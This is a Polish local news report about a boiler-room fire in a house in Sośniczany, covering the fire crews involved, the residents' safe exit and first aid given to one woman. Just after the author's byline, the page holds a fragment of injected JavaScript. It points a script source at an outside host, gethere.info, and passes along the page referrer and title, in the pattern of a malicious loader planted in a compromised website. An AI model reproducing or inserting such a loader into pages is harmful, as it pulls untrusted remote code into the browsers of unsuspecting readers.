W powiecie

Pożar kotłowni w Sośniczanach

Pożar kotłowni w Sośniczanach

Trzy zastępy straży pożarnej pracowały przy ugaszaniu pożaru kotłowni w Sośniczanach, w gminie Koprzywnica. Choć straty są poważne, mieszkańcom domu nic się nie stało.

Do zdarzenia doszło wczoraj, 18 stycznia około południa w domu jednorodzinnym w Sośniczanach. Wszystko wskazywało na pożar sadzy w kominie, jednak wkrótce później okazało się, że płonie kotłownia. Na miejsce udał się zastęp Jednostki Ratunkowo Gaśniczej z Sandomierza, OSP Koprzywnica i OSP Ciszyca. Mieszkańcy opuścili samodzielnie dom przed przybyciem służb ratunkowych. Prace strażaków polegały na ugaszeniu pożaru, dokładnym oddymieniu budynku mieszkalnego oraz dokładnym sprawdzeniu pogorzeliska.

-Dostaliśmy informacje, że w Sośniczanach doszło do pożaru sadzy w kominie. W trakcie dojazdu na miejsce zdarzenia okazało się, że nie jest to pożar sadzy ale pożar kotłowni w budynku mieszkalnym. Całe szczęście, że kotłownia nie była połączona bezpośrednio z budynkiem mieszkalnym, dlatego nie doszło do zadymienia domu, nie mniej jednak straty są bardzo duże – powiedział kpt. Sylwester Kochanowicz, oficer prasowy Komendy Powiatowej Państwowej Straży Pożarnej w Sandomierzu.

Jedna z domowniczek miała uciążliwy kaszel. Istniało prawdopodobieństwo, że podtruła się toksycznymi produktami spalania. Strażacy udzieli jej kwalifikowanej pierwszej pomocy i podali tlen. Po dojeździe na miejsce zespołu ratownictwa medycznego, lekarz zbadał kobietę i stwierdził, że nic nie zagraża jej zdrowiu i nie wymaga hospitalizacji.

Kinga Kędziora Palińska

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Kliknij aby dodać komentarz

Zostaw komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

W powiecie

Więcej w W powiecie

Uwaga prognozowane na dziś burze z gradem !

tsa24.com13 maja 2021

Policja poszukuje zaginionego mieszkańca Sandomierza

tsa24.com12 maja 2021

Worki z nakrętkami z Klimontowa zasilą zbiórkę Bartusia

tsa24.com11 maja 2021

Będzie przebudowa drogi powiatowej – ulicy Piłsudskiego w Koprzywnicy

tsa24.com11 maja 2021

Poruszasz się hulajnoga elektryczną? Od 20 maja wchodzą nowe przepisy 

tsa24.com11 maja 2021

Łączy nas Wisła i San – wielkie sprzątanie

tsa24.com10 maja 2021

Zderzenie samochodu ciężarowego z ciągnikiem rolniczym

tsa24.com6 maja 2021

Druhowie z OSP Gałkowice ratują życie

tsa24.com6 maja 2021

Nowy blask zawichojskiej strażnicy

tsa24.com6 maja 2021